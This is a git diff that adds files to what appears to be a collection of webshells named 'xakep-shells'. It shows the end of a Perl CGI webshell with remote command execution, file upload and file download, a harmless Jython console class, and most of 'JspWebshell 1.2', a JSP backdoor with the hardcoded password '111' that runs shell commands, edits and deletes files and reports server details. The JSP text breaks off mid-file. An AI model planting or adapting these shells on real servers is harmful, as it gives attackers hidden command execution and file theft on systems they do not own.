+#------------------------------------------------------------------------------
+sub ExecuteCommand
+{
+        if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
+        {
+                # we change the directory internally. The output of the
+                # command is not displayed.
+
+                $OldDir = $CurrentDir;
+                $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
+                chop($CurrentDir = `$Command`);
+                &PrintPageHeader("c");
+                $Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ ";
+                print "<code>$Prompt $RunCommand</code>";
+        }
+        else # some other command, display the output
+        {
+                &PrintPageHeader("c");
+                $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
+                print "<code>$Prompt $RunCommand</code><xmp>";
+                $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
+                if(!$WinNT)
+                {
+                        $SIG{'ALRM'} = \&CommandTimeout;
+                        alarm($CommandTimeoutDuration);
+                }
+                if($ShowDynamicOutput) # show output as it is generated
+                {
+                        $|=1;
+                        $Command .= " |";
+                        open(CommandOutput, $Command);
+                        while(<CommandOutput>)
+                        {
+                                $_ =~ s/(\n|\r\n)$//;
+                                print "$_\n";
+                        }
+                        $|=0;
+                }
+                else # show output after command completes
+                {
+                        print `$Command`;
+                }
+                if(!$WinNT)
+                {
+                        alarm(0);
+                }
+                print "</xmp>";
+        }
+        &PrintCommandLineInputForm;
+        &PrintPageFooter;
+}
+
+#------------------------------------------------------------------------------
+# This function displays the page that contains a link which allows the user
+# to download the specified file. The page also contains a auto-refresh
+# feature that starts the download automatically.
+# Argument 1: Fully qualified filename of the file to be downloaded
+#------------------------------------------------------------------------------
+sub PrintDownloadLinkPage
+{
+        local($FileUrl) = @_;
+        if(-e $FileUrl) # if the file exists
+        {
+                # encode the file link so we can send it to the browser
+                $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
+                $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
+                $HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
+                &PrintPageHeader("c");
+                print <<END;
+<code>
+Sending File $TransferFile...<br>
+If the download does not start automatically,
+<a href="$DownloadLink">Click Here</a>.
+</code>
+END
+                &PrintCommandLineInputForm;
+                &PrintPageFooter;
+        }
+        else # file doesn't exist
+        {
+                &PrintPageHeader("f");
+                print "<code>Failed to download $FileUrl: $!</code>";
+                &PrintFileDownloadForm;
+                &PrintPageFooter;
+        }
+}
+
+#------------------------------------------------------------------------------
+# This function reads the specified file from the disk and sends it to the
+# browser, so that it can be downloaded by the user.
+# Argument 1: Fully qualified pathname of the file to be sent.
+#------------------------------------------------------------------------------
+sub SendFileToBrowser
+{
+        local($SendFile) = @_;
+        if(open(SENDFILE, $SendFile)) # file opened for reading
+        {
+                if($WinNT)
+                {
+                        binmode(SENDFILE);
+                        binmode(STDOUT);
+                }
+                $FileSize = (stat($SendFile))[7];
+                ($Filename = $SendFile) =~  m!([^/^\\]*)$!;
+                print "Content-Type: application/x-unknown\n";
+                print "Content-Length: $FileSize\n";
+                print "Content-Disposition: attachment; filename=$1\n\n";
+                print while(<SENDFILE>);
+                close(SENDFILE);
+        }
+        else # failed to open file
+        {
+                &PrintPageHeader("f");
+                print "<code>Failed to download $SendFile: $!</code>";
+                &PrintFileDownloadForm;
+                &PrintPageFooter;
+        }
+}
+
+
+#------------------------------------------------------------------------------
+# This function is called when the user downloads a file. It displays a message
+# to the user and provides a link through which the file can be downloaded.
+# This function is also called when the user clicks on that link. In this case,
+# the file is read and sent to the browser.
+#------------------------------------------------------------------------------
+sub BeginDownload
+{
+        # get fully qualified path of the file to be downloaded
+        if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
+                (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
+        {
+                $TargetFile = $TransferFile;
+        }
+        else # path is relative
+        {
+                chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
+                $TargetFile .= $PathSep.$TransferFile;
+        }
+
+        if($Options eq "go") # we have to send the file
+        {
+                &SendFileToBrowser($TargetFile);
+        }
+        else # we have to send only the link page
+        {
+                &PrintDownloadLinkPage($TargetFile);
+        }
+}
+
+#------------------------------------------------------------------------------
+# This function is called when the user wants to upload a file. If the
+# file is not specified, it displays a form allowing the user to specify a
+# file, otherwise it starts the upload process.
+#------------------------------------------------------------------------------
+sub UploadFile
+{
+        # if no file is specified, print the upload form again
+        if($TransferFile eq "")
+        {
+                &PrintPageHeader("f");
+                &PrintFileUploadForm;
+                &PrintPageFooter;
+                return;
+        }
+        &PrintPageHeader("c");
+
+        # start the uploading process
+        print "<code>Uploading $TransferFile to $CurrentDir...<br>";
+
+        # get the fullly qualified pathname of the file to be created
+        chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
+        $TransferFile =~ m!([^/^\\]*)$!;
+        $TargetName .= $PathSep.$1;
+
+        $TargetFileSize = length($in{'filedata'});
+        # if the file exists and we are not supposed to overwrite it
+        if(-e $TargetName && $Options ne "overwrite")
+        {
+                print "Failed: Destination file already exists.<br>";
+        }
+        else # file is not present
+        {
+                if(open(UPLOADFILE, ">$TargetName"))
+                {
+                        binmode(UPLOADFILE) if $WinNT;
+                        print UPLOADFILE $in{'filedata'};
+                        close(UPLOADFILE);
+                        print "Transfered $TargetFileSize Bytes.<br>";
+                        print "File Path: $TargetName<br>";
+                }
+                else
+                {
+                        print "Failed: $!<br>";
+                }
+        }
+        print "</code>";
+        &PrintCommandLineInputForm;
+        &PrintPageFooter;
+}
+
+#------------------------------------------------------------------------------
+# This function is called when the user wants to download a file. If the
+# filename is not specified, it displays a form allowing the user to specify a
+# file, otherwise it displays a message to the user and provides a link
+# through  which the file can be downloaded.
+#------------------------------------------------------------------------------
+sub DownloadFile
+{
+        # if no file is specified, print the download form again
+        if($TransferFile eq "")
+        {
+                &PrintPageHeader("f");
+                &PrintFileDownloadForm;
+                &PrintPageFooter;
+                return;
+        }
+
+        # get fully qualified path of the file to be downloaded
+        if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
+                (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
+        {
+                $TargetFile = $TransferFile;
+        }
+        else # path is relative
+        {
+                chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
+                $TargetFile .= $PathSep.$TransferFile;
+        }
+
+        if($Options eq "go") # we have to send the file
+        {
+                &SendFileToBrowser($TargetFile);
+        }
+        else # we have to send only the link page
+        {
+                &PrintDownloadLinkPage($TargetFile);
+        }
+}
+
+#------------------------------------------------------------------------------
+# Main Program - Execution Starts Here
+#------------------------------------------------------------------------------
+&ReadParse;
+&GetCookies;
+
+$ScriptLocation = $ENV{'SCRIPT_NAME'};
+$ServerName = $ENV{'SERVER_NAME'};
+$LoginPassword = $in{'p'};
+$RunCommand = $in{'c'};
+$TransferFile = $in{'f'};
+$Options = $in{'o'};
+
+$Action = $in{'a'};
+$Action = "login" if($Action eq ""); # no action specified, use default
+
+# get the directory in which the commands will be executed
+$CurrentDir = $in{'d'};
+chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
+
+$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;
+
+if($Action eq "login" || !$LoggedIn) # user needs/has to login
+{
+        &PerformLogin;
+}
+elsif($Action eq "command") # user wants to run a command
+{
+        &ExecuteCommand;
+}
+elsif($Action eq "upload") # user wants to upload a file
+{
+        &UploadFile;
+}
+elsif($Action eq "download") # user wants to download a file
+{
+        &DownloadFile;
+}
+elsif($Action eq "logout") # user wants to logout
+{
+        &PerformLogout;
+}
diff --git a/xakep-shells/JSP/Java Shell.js.txt b/xakep-shells/JSP/Java Shell.js.txt
new file mode 100644
index 0000000..f15e864
--- /dev/null
+++ b/xakep-shells/JSP/Java Shell.js.txt	
@@ -0,0 +1,125 @@
+package enigma.shells.jython;
+
+import java.io.*;
+import java.awt.*;
+import javax.swing.*;
+
+import enigma.console.*;
+import enigma.console.java2d.*;
+
+import org.python.core.*;
+import org.python.util.*;
+
+public class JythonShell extends JPanel implements Runnable {
+	public static int DEFAULT_ROWS = 20;
+	public static int DEFAULT_COLUMNS = 80;
+	public static int DEFAULT_SCROLLBACK = 100;
+	
+	public PrintStream out;
+	
+	public Console console;
+	public Java2DTextWindow text;
+	public JScrollPane scrollPane;
+	public PythonInterpreter interp;
+	
+	private Color colorBackground = new Color(0, 0, 0);
+	private Color colorForeground = new Color(187, 187, 187);
+	private Color colorError = new Color(187, 0, 0);
+	private Color colorCursor = new Color(187, 187, 0);
+	
+	public JythonShell() {
+		this(null, Py.getSystemState());
+	}
+	
+	public JythonShell(PyObject dict) {
+		this(dict, Py.getSystemState());
+	}
+	
+	public JythonShell(int columns, int rows, int scrollback) {
+		this(null, Py.getSystemState(), columns, rows, scrollback);
+	}
+	
+	public JythonShell(PyObject dict, PySystemState systemState) {
+		this(dict, systemState, DEFAULT_COLUMNS, DEFAULT_ROWS, DEFAULT_SCROLLBACK);
+	}
+	
+	public JythonShell(PyObject dict, PySystemState systemState, int columns, int rows, int scrollback) {
+		super(new BorderLayout());
+		
+		text = new Java2DTextWindow(columns, rows, scrollback);
+		text.setBackground(colorBackground);
+		
+		scrollPane = new JScrollPane();
+		scrollPane.setViewportView(text);
+		
+		add(scrollPane, BorderLayout.CENTER);
+		
+		console = new DefaultConsoleImpl(text);
+		out = console.getOutputStream();
+		
+		interp = new PythonInterpreter(dict, systemState);
+		interp.setOut(out);
+		interp.setErr(out);
+	}
+	
+	public void run() {
+		int pos = 0;
+		int tbs = 4;
+		
+		String line = "";
+		String command = "";
+		
+		for (;;) {
+			String space = "";
+			for (int i = 0; i < pos * tbs; i++) {
+				space += " ";
+			}
+			
+			try {
+				console.setTextAttributes(new TextAttributes(colorCursor));
+				
+				if (pos > 0) {
+					out.print(space + "... ");
+				} else {
+					out.print(">> ");
+				}
+				
+				console.setTextAttributes(new TextAttributes(colorForeground));
+				
+				line = console.readLine().trim();
+				if (line.length() == 0 && pos > 0) {
+					pos--;
+				} else if (line.endsWith(":")) {
+					command += space + line + "\n";
+					pos++;
+				} else {
+					command += space + line + "\n";
+				}
+				
+				if (pos == 0) {
+					interp.exec(command);
+					command = "";
+				}
+			} catch (Exception e) {
+				console.setTextAttributes(new TextAttributes(colorError));
+				
+				e.printStackTrace();
+				command = "";
+			}
+		}
+	}
+	
+	public static void main(String[] argv) {
+		PySystemState.initialize(System.getProperties(), null, argv);
+		
+		JFrame frame = new JFrame("Jython Console");
+		JythonShell console = new JythonShell();
+		
+		frame.add(console, BorderLayout.CENTER);
+		frame.pack();
+		frame.setVisible(true);
+		frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
+		
+		console.run();
+	}
+}
\ No newline at end of file
diff --git a/xakep-shells/JSP/JspWebshell 1.2.jsp.txt b/xakep-shells/JSP/JspWebshell 1.2.jsp.txt
new file mode 100644
index 0000000..4ce0fcf
--- /dev/null
+++ b/xakep-shells/JSP/JspWebshell 1.2.jsp.txt	
@@ -0,0 +1,788 @@
+<%@ page contentType="text/html; charset=GBK" language="java" import="java.sql.*,java.io.File,java.io.*,java.nio.charset.Charset,java.io.IOException,java.util.*" errorPage="" %>
+<%
+/**
+ * <p>Title:JspWebshell </p>
+ *
+ * <p>Description: jspÍøÕ¾¹ÜÀí</p>
+ *
+ * <p>Copyright:¾ø¶ÔÁã¶È[B.C.T] Copyright (c) 2006</p>
+ *
+ * <p>Company: zero.cnbct.org</p>
+ *  PS:±¾³ÌÐòÊÇСµÜ´¦ÓÚÐËȤËùд£¬ÈçÓÐÒÉÎÊÇëÁªÏµQQ:48124012
+ * @version 1.2
+ */
+ String path="";
+ String selfName="";
+ boolean copyfinish=false;
+%>
+<%  selfName=request.getRequestURI();
+     // String editfile="";
+        String editfile=request.getParameter("editfile");
+		if (editfile!=null)
+		{editfile=new String(editfile.getBytes("ISO8859_1"));
+		}
+	  path=request.getParameter("path");
+		if(path==null)
+		path=config.getServletContext().getRealPath("/");
+%>
+<%!    
+    String _password ="111";//ÃÜÂë
+	public String readAllFile(String filePathName) throws IOException 
+	{ 
+	FileReader fr = new FileReader(filePathName); 
+	int count = fr.read();
+	String res="";
+	while(count != -1) 
+	{ 
+	//System.out.print((char)count); 
+		res=res+(char)count;
+	count = fr.read(); 
+	if(count == 13) 
+	{ 
+	fr.skip(1); 
+	} 
+	} 
+	fr.close(); 
+	return res;
+	} 
+public void writeFile(String filePathName,String args) throws IOException 
+{ 
+FileWriter fw = new FileWriter(filePathName); 
+PrintWriter out=new PrintWriter(fw); 
+out.write(args); 
+out.println(); 
+out.flush(); 
+fw.close(); 
+out.close(); 
+} 
+public boolean createFile(String filePathName) throws IOException 
+{ 
+boolean result = false; 
+File file = new File(filePathName); 
+if(file.exists()) 
+{ 
+System.out.println("ÎļþÒѾ­´æÔÚ£¡"); 
+} 
+else 
+{ 
+file.createNewFile(); 
+result = true; 
+System.out.println("ÎļþÒѾ­´´½¨£¡"); 
+} 
+return result; 
+}
+public boolean createFolder(String fileFolderName) 
+{ 
+boolean result = false; 
+try 
+{ 
+File file = new File(fileFolderName); 
+if(file.exists()) 
+{ 
+//file.delete(); 
+System.out.println("Ŀ¼ÒѾ­´æÔÚ!"); 
+result = true; 
+} 
+else 
+{ 
+file.mkdir(); 
+System.out.println("Ŀ¼ÒѾ­½¨Á¢!"); 
+result = true; 
+} 
+} 
+catch(Exception ex) 
+{ 
+result = false; 
+System.out.println("CreateAndDeleteFolder is error:"+ex); 
+} 
+return result; 
+}  
+
+public boolean DeleteFolder(String filefolderName) 
+{ 
+boolean result = false; 
+try 
+{ 
+File file = new File(filefolderName); 
+if(file.exists()) 
+{ 
+file.delete(); 
+System.out.println("Ŀ¼ÒÑɾ³ý!"); 
+result = true; 
+} 
+} 
+catch(Exception ex) 
+{ 
+result = false; 
+System.out.println("CreateAndDeleteFolder is error:"+ex); 
+} 
+return result; 
+} 
+public boolean validate(String password) {
+	if (password.equals(_password)) {
+		return true;
+	} else {
+		return false;
+	}
+}
+public String HTMLEncode(String str) {
+	str = str.replaceAll(" ", "&nbsp;");
+	str = str.replaceAll("<", "&lt;");
+	str = str.replaceAll(">", "&gt;");
+	str = str.replaceAll("\r\n", "<br>");
+	
+	return str;
+}
+    public String exeCmd(String cmd) {
+	Runtime runtime = Runtime.getRuntime();
+	Process proc = null;
+	String retStr = "";
+	InputStreamReader insReader = null;
+	char[] tmpBuffer = new char[1024];
+	int nRet = 0;
+	
+	try {
+		proc = runtime.exec(cmd);
+		insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312"));
+		while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {
+			retStr += new String(tmpBuffer, 0, nRet);
+		}
+		
+		insReader.close();
+		retStr = HTMLEncode(retStr);
+	} catch (Exception e) {
+		retStr = "<font color=\"red\">ÃüÁî´íÎó\"" + cmd + "\"";
+	} finally {
+		return retStr;
+	}
+	}
+	public boolean fileCopy(String srcPath, String dstPath) {
+	boolean bRet = true;
+	
+	try {
+		FileInputStream in = new FileInputStream(new File(srcPath));
+		FileOutputStream out = new FileOutputStream(new File(dstPath));
+		byte[] buffer = new byte[1024];
+		int nBytes;
+		
+
+		while ((nBytes = in.read(buffer, 0, 1024)) != -1) {
+			out.write(buffer, 0, nBytes);
+		}
+		
+		in.close();
+		out.close();
+	} catch (IOException e) {
+		bRet = false;
+	}	
+	
+	return bRet;
+}
+class EnvServlet
+{
+	public long timeUse=0;
+	public Hashtable htParam=new Hashtable();
+	private Hashtable htShowMsg=new Hashtable();
+	public void setHashtable()
+	{
+		Properties me=System.getProperties();
+		Enumeration em=me.propertyNames();
+		while(em.hasMoreElements())
+		{
+			String strKey=(String)em.nextElement();
+			String strValue=me.getProperty(strKey);
+			htParam.put(strKey,strValue);
+		}
+	}	
+	public void getHashtable(String strQuery)
+	{
+		Enumeration em=htParam.keys();
+		while(em.hasMoreElements())
+		{
+			String strKey=(String)em.nextElement();
+			String strValue=new String();
+			if(strKey.indexOf(strQuery,0)>=0)
+			{
+				strValue=(String)htParam.get(strKey);
+				htShowMsg.put(strKey,strValue);
+			}
+		}
+	}
+	public String queryHashtable(String strKey)
+	{
+		strKey=(String)htParam.get(strKey);
+		return strKey;
+	}
+/*	public long test_int()
+	{
+		long timeStart = System.currentTimeMillis();
+		int i=0;
+		while(i<3000000)i++;
+		long timeEnd = System.currentTimeMillis();
+		long timeUse=timeEnd-timeStart;
+		return timeUse;
+	}
+	public long test_sqrt()
+	{
+		long timeStart = System.currentTimeMillis();
+		int i=0;
+		double db=(double)new Random().nextInt(1000);
+		while(i<200000){db=Math.sqrt(db);i++;}
+		long timeEnd = System.currentTimeMillis();
+		long timeUse=timeEnd-timeStart;
+		return timeUse;
+	}*/
+}
+%>
+<%
+	EnvServlet env=new EnvServlet();
+	env.setHashtable();
+	//String action=new String(" ");
+	//String act=new String("action");
+	//if(request.getQueryString()!=null&&request.getQueryString().indexOf(act,0)>=0)action=request.getParameter(act);
+%>
+
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
+<title>JspWebShell By ¾ø¶ÔÁã¶È</title>
+<style>
+body {
+	font-size: 12px;
+	font-family: "ËÎÌå";
+	background-color: #666666;
+}
+A {
+	COLOR: black; TEXT-DECORATION: none
+}
+A:hover {
+	COLOR: black; TEXT-DECORATION: underline; none: 
+}
+td {
+	font-size: 12px;
+	font-family: "ËÎÌå";
+	color: #000000;
+}
+
+input.textbox {
+	border: black solid 1;
+	font-size: 12px;
+	height: 18px;
+}
+
+input.button {
+	font-size: 12px;
+	font-family: "ËÎÌå";
+	border: black solid 1;
+}
+
+td.datarows {
+	font-size: 12px;
+	font-family: "ËÎÌå";
+	height: 25px;
+	color: #000000;
+}
+.PicBar { background-color: #f58200; border: 1px solid #000000; height: 12px;}
+textarea {
+border: black solid 1;
+}
+.inputLogin {font-size: 9pt;border:1px solid lightgrey;background-color: lightgrey;}
+.table1 {BORDER:gray 0px ridge;}
+.td2 {BORDER-RIGHT:#ffffff 0px solid;BORDER-TOP:#ffffff 1px solid;BORDER-LEFT:#ffffff 1px solid;BORDER-BOTTOM:#ffffff 0px solid;BACKGROUND-COLOR:lightgrey; height:18px;}
+.tr1 {BACKGROUND-color:gray }
+</style>
+<script language="JavaScript" type="text/JavaScript">
+<!--
+function MM_reloadPage(init) {  //reloads the window if Nav4 resized
+  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
+    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
+  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
+}
+MM_reloadPage(true);
+//-->
+</script>
+</head>
+<body bgcolor="#666666">
+<%
+//session.setMaxInactiveInterval(_sessionOutTime * 60);
+String password=request.getParameter("password");
+if (password == null && session.getAttribute("password") == null) {
+
+%>
+
+<div align="center" style="position:absolute;width:100%;visibility:show; z-index:0;left:4px;top:272px"> 
+  <TABLE class="table1" cellSpacing="1" cellPadding="1" width="473" border="0" align="center">
+    <tr> 
+      <td class="tr1"> <TABLE cellSpacing="0" cellPadding="0" width="468" border="0">
+          <tr> 
+            <TD align="left" bgcolor="#333333"><FONT face="webdings" color="#ffffff">&nbsp;8</FONT><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff"><b>JspWebShell 
+              version 1.2¹ÜÀíµÇ¼ :::...</b></font></TD>
+            <TD align="right" bgcolor="#333333"><FONT color="#d2d8ec">Power By 
+              ¾ø¶ÔÁã¶È</FONT></TD>
+          </tr>
+          <form name="bctform" method="post">
+            <tr bgcolor="#999999"> 
+              <td height="30" colspan="2" align="center" class="td2"> 
+                <input name="password" type="password" class="textbox" id="Textbox" /> 
+                <input type="submit" name="Button" value="Login" id="Button" title="Click here to login" class="button" /> 
+              </td>
+            </tr>
+          </form>
+        </TABLE></td>
+    </tr>
+  </TABLE>
+</div>
+<%
+
+	} else {
+	
+	if (session.getAttribute("password") == null) {
+		
+		if (validate(password) == false) {
+			out.println("<div align=\"center\"><font color=\"red\"><li>ÃÜÂë´íÎó</font></div>");
+			out.close();
+			return;
+		}
+		
+		session.setAttribute("password", password);
+	} else {
+		password = (String)session.getAttribute("password");
+	}
+%>
+	<%
+		File tmpFile = null;
+		String delfile="";
+		String delfile1="";
+		String editpath="";
+		delfile1=request.getParameter("delfile");
+		editpath=request.getParameter("filepath");
+		if (delfile1!=null)
+		{delfile=new String(delfile1.getBytes("ISO8859_1"));
+		}
+        if ( delfile1!= null) {
+        //  out.print(delfile);
+	    	tmpFile = new File(delfile);
+		if (! tmpFile.delete()) {
+			out.print( "<font color=\"red\">ɾ³ýʧ°Ü</font><br>\n");
+			}
+			}
+%>
+  <%String editfilecontent=null;
+       String editfilecontent1=request.getParameter("content");
+	   // out.println(editfilecontent1);
+		//String save=request.getParameter("save");
+	   if (editfilecontent1!=null)
+	   {editfilecontent=new String(editfilecontent1.getBytes("ISO8859_1"));}
+          //   out.print(editfile);
+			//out.print(editfilecontent);
+            if (editfile!=null&editfilecontent!=null)
+			{try {writeFile(editfile,editfilecontent);}
+			 catch (Exception e) {out.print("дÈëʧ°Ü");}
+			 out.print("дÈë³É¹¦");
+			}
+			%>
+<%request.setCharacterEncoding("GBK");%>
+<%//String editfile=request.getParameter("editfile");
+//out.print(editfile);
+if (request.getParameter("jsptz")!=null)
+{%>
+<div id="Layer2" style="position:absolute; left:9px; top:340px; width:725px; height:59px; z-index:2"> 
+  <CENTER>
+  <table border="0" cellpadding="0" cellspacing="1" class="tableBorder">
+  <tr> 
+      <td height="22" align="center" bgcolor="#000000" ><font color=#FFFFFF><strong>·þÎñÆ÷Ïà¹Ø²ÎÊý</strong></font>      
+      </td>
+  </tr>
+  <tr> 
+    <td style="display" id='submenu0'><table border=0 width=100% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
+          <tr bgcolor="#999999" height="22">
+		  <td width="130" bgcolor="#999999">&nbsp;·þÎñÆ÷Ãû</td>
+            <td height="22" colspan="3">&nbsp;<%= request.getServerName() %>(<%=request.getRemoteAddr()%>)</td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;·þÎñÆ÷²Ù×÷ϵͳ</td>
+            <td colspan="3">&nbsp;<%=env.queryHashtable("os.name")%> <%=env.queryHashtable("os.version")%> 
+              <%=env.queryHashtable("sun.os.patch.level")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;·þÎñÆ÷²Ù×÷ϵͳÀàÐÍ</td>
+            <td>&nbsp;<%=env.queryHashtable("os.arch")%></td>
+            <td>&nbsp;·þÎñÆ÷²Ù×÷ϵͳģʽ</td>
+            <td>&nbsp;<%=env.queryHashtable("sun.arch.data.model")%>λ</td>
+          </tr>     
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;·þÎñÆ÷ËùÔÚµØÇø</td>
+            <td>&nbsp;<%=env.queryHashtable("user.country")%></td>
+            <td>&nbsp;·þÎñÆ÷ÓïÑÔ</td>
+            <td>&nbsp;<%=env.queryHashtable("user.language")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;·þÎñÆ÷ʱÇø</td>
+            <td>&nbsp;<%=env.queryHashtable("user.timezone")%></td>
+            <td>&nbsp;·þÎñÆ÷ʱ¼ä</td>
+            <td>&nbsp;<%=new java.util.Date()%> </td>
+          </tr>
+		  <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;·þÎñÆ÷½âÒëÒýÇæ</td>
+            <td width="170">&nbsp;<%= getServletContext().getServerInfo() %></td>
+            <td width="130">&nbsp;·þÎñÆ÷¶Ë¿Ú</td>
+            <td width="170">&nbsp;<%= request.getServerPort() %></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td height="22">&nbsp;µ±Ç°Óû§</td>
+            <td height="22" colspan="3">&nbsp;<%=env.queryHashtable("user.name")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;Óû§Ä¿Â¼</td>
+            <td colspan="3">&nbsp;<%=env.queryHashtable("user.dir")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td align=left>&nbsp;±¾Îļþʵ¼Ê·¾¶</td>
+            <td height="8" colspan="3">&nbsp;<%=request.getRealPath(request.getServletPath())%></td>
+          </tr>
+        </table>
+    </td>
+  </tr>
+</table>
+  <br>
+    <table width="640" border="0" cellpadding="0" cellspacing="1" class="tableBorder">
+      <tr> 
+      <td width="454" height="22" align="center" bgcolor="#000000" onclick="showsubmenu(1)"><font color=#FFFFFF><strong>JAVAÏà¹Ø²ÎÊý</strong></font> 
+      </td>
+  </tr>
+  <tr> 
+    <td style="display" id='submenu1'>
+		<table border=0 width=99% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
+            <tr bgcolor="#666666" height="22"> 
+            <td width="30%">&nbsp;Ãû³Æ</td>
+            <td width="50%" height="22">&nbsp;Ó¢ÎÄÃû³Æ</td>
+            <td width="20%" height="22">&nbsp;°æ±¾</td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;JAVAÔËÐл·¾³Ãû³Æ</td>
+            <td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.runtime.name")%></td>
+            <td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.runtime.version")%></td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;JAVAÔËÐл·¾³ËµÃ÷ÊéÃû³Æ</td>
+            <td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.specification.name")%></td>
+            <td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.specification.version")%></td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;JAVAÐéÄâ»úÃû³Æ</td>
+            <td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.vm.name")%></td>
+            <td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.vm.version")%></td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;JAVAÐéÄâ»ú˵Ã÷ÊéÃû³Æ</td>
+            <td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.vm.specification.name")%></td>
+            <td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.vm.specification.version")%></td>
+          </tr>
+		  <%
+		  	float fFreeMemory=(float)Runtime.getRuntime().freeMemory();
+			float fTotalMemory=(float)Runtime.getRuntime().totalMemory();
+			float fPercent=fFreeMemory/fTotalMemory*100;
+		  %>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td height="22">&nbsp;JAVAÐéÄâ»úÊ£ÓàÄڴ棺</td>
+            <td height="22" colspan="2"><img width='8' height="12" align=absmiddle class=PicBar style="background-color: #000000">&nbsp;<%=fFreeMemory/1024/1024%>M 
+            </td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td height="22">&nbsp;JAVAÐéÄâ»ú·ÖÅäÄÚ´æ</td>
+            <td height="22" colspan="2"><img width='85%' align=absmiddle class=PicBar style="background-color: #000000">&nbsp;<%=fTotalMemory/1024/1024%>M 
+            </td>
+          </tr>
+        </table>
+		  <table border=0 width=99% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
+            <tr bgcolor="#666666" height="22"> 
+            <td width="30%">&nbsp;²ÎÊýÃû³Æ</td>
+            <td width="70%" height="22">&nbsp;²ÎÊý·¾¶</td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.class.path </td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.class.path").replaceAll(env.queryHashtable("path.separator"),env.queryHashtable("path.separator")+"<br>&nbsp;")%>	
+            </td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.home</td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.home")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.endorsed.dirs</td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.endorsed.dirs")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.library.path</td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.library.path").replaceAll(env.queryHashtable("path.separator"),env.queryHashtable("path.separator")+"<br>&nbsp;")%> 
+            </td>
+          </tr>
+		  <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.io.tmpdir</td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.io.tmpdir")%></td>
+          </tr>
+        </table>
+    </td>
+  </tr>
+</table>
+  <br>
+  <div id="testspeed" align="center"> </div>
+</CENTER></div>
+
+<%}
+else{
+if (editfile!=null)//if edit
+{
+%>
+<div id="Layer1" style="position:absolute; left:-17px; top:1029px; width:757px; height:250px; z-index:1"> 
+  <table width="99%" height="232" border="0">
+    <tr> 
+      <td height="226"><form name="form2" method="post" action="">
+          <p align="center"> µØÖ·£º
+            <input name="editfile" type="text" value="<%=editfile%>" size="50">
+          </p>
+          <p align="center"> 
+            <textarea name="content" cols="105" rows="30"><%=readAllFile(editfile)%></textarea>
+            <input type="submit" name="Submit2" value="±£´æ">
+          </p>
+        </form> </td>
+    </tr>
+  </table>
+  <p>&nbsp;</p></div>
+<%}
